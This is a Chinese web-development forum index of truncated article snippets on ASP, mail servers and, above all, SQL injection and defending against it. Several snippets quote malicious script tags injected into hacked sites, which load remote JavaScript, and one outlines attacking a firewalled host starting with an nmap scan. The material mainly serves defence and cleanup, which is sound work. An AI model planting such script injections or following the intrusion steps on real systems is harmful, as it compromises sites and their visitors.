|
最新文章
|
知識管理交流
→『 技術文檔交流 』
本版文數:9243 今日文數:3853
|
|
有個網站可以自己根據自己需要選擇生成所需要的londing圖標,非常漂亮,很喜歡。網站在這里:http://preloaders.net/en/3d
|
|
這兩天公司給了我一個任務,讓我給公司和一個客戶安裝一個郵件服務器,需求是:免費,最好是正版;支持多域名(因為公司、客戶的兩個域名同時用一個服務器);支持較多用戶;運行環境是windows平臺這次我找到了一個比較不錯的郵件服務器:hMailServer,當前發布的服務器版本是5.3.3。這個郵件服務器是開源的郵件服務器,...
|
|
authenticatedusers:包括在計算機上或活動目錄中的所有通過身份驗證的賬戶。其身份已得到計算機驗證的所有用戶。身份驗證的用戶不包括來賓,即使來賓帳戶有密碼。所有經過windowsxp驗證程序登錄的用戶均屬于此組。authenticatedusers(經過身份驗證的用戶)用戶組具有向activedirect...
|
|
全球互聯網IP地址相關管理組織3日說,現有的互聯網IP地址已于當天分配完畢,IP地址總庫已經枯竭,互聯網未來發展將系于在全球范圍內普及下一代互聯網通信協議。國際互聯網名稱和編號分配公司(ICANN)發布的新聞公報說,在3日于美國邁阿密舉行的一個會議上,最后所剩的5組IP地址(基于互聯網通信協議IPv4)被分配給了全球5...
|
|
剛剛在9月編程語言排行榜上取得歷史性突破的PHP在Web開發領域最到的對手可能就是基于微軟.NET技術的ASP.NET。近日,微軟的JoeStagner在博客上發表了一系列文章比較了PHP和ASP.NET性能方面的文章,引起了來自雙方程序員的大量回應。Joe表示,他會將這樣的測試持續下去,并尋求更為合適的方式,以獲得對...
|
|
收集整理了asp當中一些常用的判斷函數<1>IsArray函數返回Boolean值指明某變量是否為數組。語法IsArray(varname)varname參數可以是任意變量。說明如果變量是數組,IsArray函數返回True;否則,函數返回False。當變量中包含有數組時,使用IsArray函數很有效。&l...
|
|
<%先下載遠程圖片url=http://www.webjx.com/images/logo.gif遠程圖片地址savepath=D:\photo\保存路徑為文件重命名randomizeranNum=int(999*rnd)filename=year(now)&month(now)&day(now)...
|
|
正則表達式(RegularExpression)為字符串模式匹配提供了一種高效、方便的方法。幾乎所有高級語言都提供了對正則表達式的支持,或者提供了現成的代碼庫供調用。本文以ASP環境中常見的處理任務為例,介紹正則表達式的應用技巧。一、檢驗密碼和郵件地址的格式我們的第一個實例示范正則表達式的一項基本功能:抽象地描述任意復...
|
|
近期,我管理的一個網站被注入木馬代碼<scriptsrc=http://cn.daxia123.cn/cn.js></script>,在百度搜索這段代碼,竟然可以搜到20萬多的網站被注入了,真是把我郁悶了一天啊!!!!這個木馬大概在2008-12-24號爆發至今。。越來越多的網站中標。daxia...
|
|
SQL注入是一種攻擊方式,在這種攻擊方式中,惡意代碼被插入到字符串中,然后將該字符串傳遞到SQLServer的實例以進行分析和執行。任何構成SQL語句的過程都應進行注入漏洞檢查,因為SQLServer將執行其接收到的所有語法有效的查詢。一個有經驗的、堅定的攻擊者甚至可以操作參數化數據。SQL注入的主要形式包括直接將代碼...
|
|
我們在用ASP開發文件上傳功能的時候,為了防止用戶上傳木馬程序,常常會限制一些文件的上傳,常用的方法是判斷一下上傳文件的擴展名是否符合規定,可以用right字符串函數取出上傳文件的文件名的后四位,這樣很容易就能判斷了,但是這里面有一個漏洞,非常危險,就是chr(0)漏洞,詳情請接著往下看。一、首先解釋下什么是chr(0...
|
|
裝上了防火墻的主機,進行入侵攻擊的大概思路小結一下。首先當然是用掃描器對這臺服務器(以下簡稱主機A)進行常規的掃描,得到初步的信息。再用nmap-sSIP-P0-p139,透過防火墻查看是否開有139端口。從上面得到的信息我們可以簡單的判斷到:主機A的系統是什么,裝有防火墻的話,一般是只允許80端口開放的。如果能夠泄漏...
|
|
比較經典的一片帖子,今天轉過來大家學習一下:編寫代碼的時候,沒有對用戶輸入數據的合法性進行判斷,使應用程序存在安全隱患。用戶可以提交一段數據庫查詢代碼,根據程序返回的結果,獲得某些他想得知的數據,這就是所謂的SQLInjection,即SQL注入。本文出處:http://www.yutianedu.com/52netw...
|
|
解決辦法:控制面板->管理工具->服務,找到MSSQLSERVER服務,右鍵->屬性->登錄,選中“本地系統帳戶”,確定是不是改密碼了?估計是用戶名和密碼有差錯,現在用本地系統帳戶就可以了.SQLServer1069錯誤(由于登錄失敗而無法啟動服務)解決方法1.我的電腦--控制面板--管理工具-...
|
|
上周給別人做了個網站,無意間發現自己的作品有很多漏洞,在短短的20秒就被自己用sql注入法給干了。所以查了一點關于sql注入的資料,并且有點感悟,希望能與新手們分享一下。高手們見笑了!SQL注入攻擊的總體思路:發現SQL注入位置;判斷服務器類型和后臺數據庫類型;確定可執行情況對于有些攻擊者而言,一般會采取sql注入法。...
|
|
你的網站是否經常遭到非法攻擊?是否因盜鏈或P2P多線程下載而耗盡帶寬資源?是否沒錢購買網上的此類軟件?那么請使用Safe3IISFireWall吧!Safe3IISFireWall是一款完全免費的IIS防護軟件,內置如下功能,主要防止黑客攻擊和多線程下載占用帶寬。軟件功能:防止SQL注入式攻擊;防止溢出代碼攻擊;防止特...
|
|
最近接收一個爛攤子,數據庫都被sql注入過一兩次了,到處都可以看到標題上那種東西,看得小妹我想死,我是燥性子看著有火,在網站上看了n多防注入的方法,記錄一下一種是從數據庫入手的,我這個爛攤子是用的sqlserver2000的,-----------------------------------------------...
|
|
現在做網站的專業人員越來越多,網站也越來越豐富和充實,不過可能很多人都沒有發現,許多網站程序在編寫時,沒有對用戶輸入數據的合法性進行判斷,使應用程序存在安全隱患。這個就是sql注入問題。SQL注入是什么?許多網站程序在編寫時,沒有對用戶輸入數據的合法性進行判斷,使應用程序存在安全隱患。用戶可以提交一段數據庫查詢代碼(一...
|
|
針對最近老是出現的SQL注入,借鑒網上一些SQL語句,寫了如下語句。希望對中招的朋友有所幫助。使用方法:復制以下代碼到SQL查詢分析器,將‘<scriptsrc=http://cn.jxmmtv.com/cn.js></script>’修改成被注入的腳本。declare@delStrnvarch...
|
|
黑客先從搜索引擎google、百度等搜索存在漏洞的采用asp+mssql設計的網站,然后采用小明子這樣的注入掃描工具,掃描整個網站,一旦發現有sql注入的漏洞或者上傳漏洞,黑客就通過各種手段,上傳自己的大馬,如海陽木馬;然后,黑客就把這個網站納入他的肉雞列表,隨時在數據庫里加入自己希望加的js代碼,而這些代碼往往是包含...
|
|
如何使用SQL注入攻擊工具進行測試。給出SQL注入漏洞防御的措施。很簡單的,建個ASP文件,名字為chk.asp,把下面的代碼放到里面。在你的網站的頂部你應該有conn.asp吧。就是連接數據庫的那個ASP文件,你可以再CONN.ASP里寫,這樣就可以了,路徑要寫對啊。<%dimsql_injdataSQL_in...
|
|
一、GetRows的使用方法:<%Setconn=Server.CreateObject(Adodb.Connection)conn.OpenProvider=Microsoft.Jet.OLEDB.4.0;DataSource=&Server.Mappath(test.mdb)SetRs=Server....
|
|
1、最簡單的如下DimobjConnSetobjConn=Server.CreateObject(ADOBD.Connection)objConn.OpenApplication(Connection_String)Callthestoredproceduretoincrementacounteronthepageob...
|
400 186 1886
